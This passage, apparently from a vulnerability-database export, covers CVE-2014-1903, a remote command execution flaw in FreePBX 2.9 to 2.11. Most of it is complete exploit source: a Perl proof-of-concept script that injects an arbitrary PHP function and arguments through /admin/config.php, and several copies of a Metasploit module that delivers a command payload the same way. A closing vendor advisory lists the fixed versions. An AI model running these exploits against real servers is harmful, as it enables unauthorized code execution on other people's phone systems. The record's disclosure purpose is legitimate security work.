rand_text_alpha_lower(rand(10) + 5)\r\n\r\n print_status(\"#{peer} - Sending payload\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"admin\", \"config.php\"),\r\n 'vars_get' => {\r\n \"display\" => rand_data,\r\n \"handler\" => \"api\",\r\n \"function\" => datastore['PHPFUNC'],\r\n \"args\" => payload.encoded\r\n }\r\n })\r\n\r\n # If we don't get a 200 when we request our malicious payload, we suspect\r\n # we don't have a shell, either.\r\n if res and res.code != 200\r\n print_error(\"#{peer} - Unexpected response, exploit probably failed!\")\r\n end\r\n\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32512/"}, {"lastseen": "2016-02-03T16:27:18", "description": "FreePBX 2.11.0 - Remote Command Execution. CVE-2014-1903. Webapps exploit for php platform", "published": "2014-03-12T00:00:00", "type": "exploitdb", "title": "FreePBX 2.11.0 - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-03-12T00:00:00", "id": "EDB-ID:32214", "href": "https://www.exploit-db.com/exploits/32214/", "sourceData": "#!/usr/bin/perl\r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket::INET;\r\n\r\n# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution\r\n# Google Dork: n/a\r\n# Date: 2/25/14\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: http://www.freepbx.org/\r\n# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz\r\n# Version: 2.11 tested working\r\n# Tested on: Ubuntu 12.04, 13.10\r\n# CVE : CVE-2014-1903\r\n\r\n\r\n#\tReferences:\r\n#\thttp://seclists.org/bugtraq/2014/Feb/42\r\n#\thttp://issues.freepbx.org/browse/FREEPBX-7123\r\n#\thttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903\r\n#\r\n#\tDeveloper Advisory:\r\n#\thttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice\r\n\r\n\r\n\r\n# in /admin/config.php\r\n#\t// handle special requests\r\n#\tif (!isset($no_auth) && isset($_REQUEST['handler'])) {\r\n#\t\t$module = isset($_REQUEST['module'])\t? $_REQUEST['module']\t: '';\r\n#\t\t$file \t= isset($_REQUEST['file'])\t\t? $_REQUEST['file']\t\t: '';\r\n#\t\tfileRequestHandler($_REQUEST['handler'], $module, $file);\r\n#\t\texit();\r\n#\t}\r\n\r\n\r\n# in /admin/library/view.functions.php\r\n#\t case 'api':\r\n#\t if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {\r\n#\t $function = $_REQUEST['function'];\r\n#\t $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';\r\n#\t\r\n#\t //currently works for one arg functions, eventually need to clean this up to except more args\r\n#\t $result = $function($args);\r\n#\t $jr = json_encode($result);\r\n#\t } else {\r\n#\t $jr = json_encode(null);\r\n#\t }\r\n#\t header(\"Content-type: application/json\");\r\n#\t echo $jr;\r\n#\t break;\r\n\r\n\r\n$| = 1;\r\n\r\nmy $sock = new IO::Socket::INET (\r\n PeerHost => $ARGV[0],\r\n PeerPort => '80',\r\n Proto => 'tcp',\r\n);\r\ndie \"$!\\n\" unless $sock;\r\nmy $func = $ARGV[1];\r\nmy $args = \"\";\r\nmy $i = 0;\r\nmy $max = 1;\r\nforeach(@ARGV) {\r\n\tif ($i > 1) {\r\n\t\t$args .= $_;\r\n\t}\r\n\tunless($i > (scalar(@ARGV) - 2)) {\r\n\t\t$args .= \"%20\";\r\n\t}\r\n\t$i++;\r\n}\r\nmy $payload = \"display=A&handler=api&file=A&module=A&function=\" . $func . \"&args=\" . $args;\r\nchomp($payload);\r\nprint \"payload is \" . $payload . \"\\n\";\r\nmy $packet = \t\"GET http://\" . $ARGV[0] . \"/admin/config.php?\" . $payload . \"\\r\\n\\r\\n\";\r\nmy $size = $sock->send($packet);\r\nshutdown($sock, 1);\r\nmy $resp;\r\n$sock->recv($resp, 1024);\r\nprint $resp . \"\\n\";\r\n$sock->close();\r\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32214/"}], "zdt": [{"lastseen": "2018-02-09T07:15:33", "description": "This Metasploit module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11. It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\" parameters \"function\" and \"args\".", "edition": 2, "published": "2014-03-25T00:00:00", "type": "zdt", "title": "FreePBX config.php Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-03-25T00:00:00", "id": "1337DAY-ID-22062", "href": "https://0day.today/exploit/description/22062", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"FreePBX config.php Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.\r\n It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\"\r\n parameters \"function\" and \"args\".\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'i-Hmx', # Vulnerability discovery\r\n '0x00string', # PoC\r\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-1903'],\r\n ['OSVDB', '103240'],\r\n ['EDB', '32214'],\r\n ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']\r\n ],\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['FreePBX', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 21 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])\r\n ], self.class)\r\n end\r\n\r\n\r\n def check\r\n vprint_status(\"#{peer} - Trying to detect installed version\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"admin\", \"CHANGES\")\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /^(.*)$/\r\n version = $1\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n vprint_status(\"#{peer} - Version #{version} detected\")\r\n\r\n if version =~ /2\\.(9|10|11)\\.0/\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n rand_data = rand_text_alpha_lower(rand(10) + 5)\r\n\r\n print_status(\"#{peer} - Sending payload\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"admin\", \"config.php\"),\r\n 'vars_get' => {\r\n \"display\" => rand_data,\r\n \"handler\" => \"api\",\r\n \"function\" => datastore['PHPFUNC'],\r\n \"args\" => payload.encoded\r\n }\r\n })\r\n\r\n # If we don't get a 200 when we request our malicious payload, we suspect\r\n # we don't have a shell, either.\r\n if res and res.code != 200\r\n print_error(\"#{peer} - Unexpected response, exploit probably failed!\")\r\n end\r\n\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22062"}], "metasploit": [{"lastseen": "2020-10-14T23:44:36", "description": "This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11. It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\" parameters \"function\" and \"args\".\n", "published": "2014-03-21T03:29:15", "type": "metasploit", "title": "FreePBX config.php Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/FREEPBX_CONFIG_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"FreePBX config.php Remote Code Execution\",\n 'Description' => %q{\n This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.\n It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\"\n parameters \"function\" and \"args\".\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'i-Hmx', # Vulnerability discovery\n '0x00string', # PoC\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-1903'],\n ['OSVDB', '103240'],\n ['EDB', '32214'],\n ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n ['FreePBX', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-03-21',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])\n ])\n\n register_advanced_options(\n [\n OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])\n ])\n end\n\n\n def check\n vprint_status(\"Trying to detect installed version\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"admin\", \"CHANGES\")\n })\n\n if res and res.code == 200 and res.body =~ /^(.*)$/\n version = $1\n else\n return Exploit::CheckCode::Unknown\n end\n\n vprint_status(\"Version #{version} detected\")\n\n if version =~ /2\\.(9|10|11)\\.0/\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n rand_data = rand_text_alpha_lower(rand(10) + 5)\n\n print_status(\"Sending payload\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"admin\", \"config.php\"),\n 'vars_get' => {\n \"display\" => rand_data,\n \"handler\" => \"api\",\n \"function\" => datastore['PHPFUNC'],\n \"args\" => payload.encoded\n }\n })\n\n # If we don't get a 200 when we request our malicious payload, we suspect\n # we don't have a shell, either.\n if res and res.code != 200\n print_error(\"Unexpected response, exploit probably failed!\")\n end\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/freepbx_config_exec.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": [], "description": "\r\n\r\nOverview:\r\nUnauthenticated user-level Remote Code Execution (RCE) vulnerability in admin/config.php, the main interface to FreePBX. This bug was introduced in FreePBX 2.9, earlier versions are not affected.\r\n\r\nScore - 8.4 \r\n(AV:N/AC:L/Au:N/C:P/I:P/A:C/E:H/RL:OF/RC:C/CDP:MH/TD:ND/CR:L/IR:L/AR:M)\r\n\r\nReference to Advisory:\r\nhttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice\r\n\r\nReference to Bug:\r\nhttp://issues.freepbx.org/browse/FREEPBX-7123\r\n\r\nFixed in Versions:\r\n2.9 -- 2.9.0.14\r\n2.10 - 2.10.1.15\r\n2.11 - 2.11.0.23\r\n12 - 12.0.1alpha22\r\n\r\nAdditional Information:\r\nFreePBX contains an automatic alert service for upgrade notifications. If your system is set up correctly, you would have received an email alert of this vulnerability when it was detected and fixed. Schmoozecom strongly urges you to ensure that the email alert address is correct and up to date to ensure you receive notifications of security issues and pending updates.\r\n\r\nSchmoozecom and FreePBX are very proactive and responsive to security issues, and care deeply about the security of our software and systems. We welcome security related bug reports and issues, and they can be submitted via email to security@freepbx.org for instant attention.\r\n\r\n", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30680", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30680", "title": "[CVE-2014-1903] FreePBX 2.9 through 12 RCE", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}